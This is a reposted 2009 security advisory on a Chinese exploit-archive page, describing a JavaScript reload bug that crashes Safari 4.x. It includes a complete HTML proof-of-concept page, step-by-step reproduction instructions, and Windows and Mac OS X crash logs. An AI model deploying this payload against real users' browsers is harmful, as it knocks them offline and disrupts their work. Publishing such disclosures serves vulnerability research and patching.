Apple Safari 4.x JavaScript Reload Remote Crash Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Apple Safari 4.x JavaScript Reload Remote Crash Exploit

来源：mail [at] marcell-dietl [dot] de 作者：Marcell 发布时间：2009-07-03

___________________________________________________________________________________

Apple Safari 4.x JavaScript Reload Denial of Service
___________________________________________________________________________________

Author   : Marcell 'SkyOut' Dietl, Achim Hoffmann
Email    : mail [at] marcell-dietl [dot] de
Vendor   : http://www.apple.com/
Product : http://www.apple.com/safari/
Found    : 12.06.2009
Released : 01.07.2009

Tested on:
- Safari 4.0 at Windows XP SP3
- Safari 4.0.1 at Mac OS X 10.5.7
___________________________________________________________________________________
STEPS TO REPRODUCE

1) Create a HTML file with the following content:

+----------
| <html>
| <body>
| <script src="empty.js"></script>
| <script>
| try { crashSafari(); } catch(e) {
| setTimeout("location.reload();",42);
| prompt('apple culpa? comment:'); }
| </script>
| </body>
| </html>
+----------

2) Create an empty file called "empty.js" in the same directory.

3) Put both files into the WWW directory of your server.

4) Access the HTML file with your browser.
   - A popup will appear: Close it.
   - A popup will appear: Close it.
   - Crash.

5) On Windows:

+----------
| AppName: safari.exe AppVer: 4.530.17.0 ModName: webkit.dll
| ModVer: 4.530.17.0 Offset: 00305f55
+----------

5) On Mac OS X:

+----------
| Process:         Safari [298]
| Path:            /Applications/Safari.app/Contents/MacOS/Safari
| Identifier:      com.apple.Safari
| Version:         4.0.1 (5530.18)
| Build Info:      WebBrowser-55301800~1
| Code Type:       X86 (Native)
| Parent Process: launchd [163]
|
| Date/Time:       2009-07-01 00:58:48.144 +0200
| OS Version:      Mac OS X 10.5.7 (9J61)
| Report Version: 6
|
| Exception Type: EXC_BAD_ACCESS (SIGBUS)
| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002
|
| Thread 0 crashed with X86 Thread State (32-bit):
|   eax: 0x00000002 ebx: 0x900bac11 ecx: 0x00625eec edx: 0x00000000
|   edi: 0x00625ec8 esi: 0x00000002 ebp: 0xbfffe778 esp: 0xbfffe5e0
|    ss: 0x0000001f efl: 0x00010217 eip: 0x900bac74   cs: 0x00000017
|    ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
|   cr2: 0x00000002
+----------
___________________________________________________________________________________
Advisory : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php

Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html

Apple has been informed about the bug, but did not show any interest.
___________________________________________________________________________________
HAVING FUN WITH FULL DISCLOSURE SINCE 2006

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告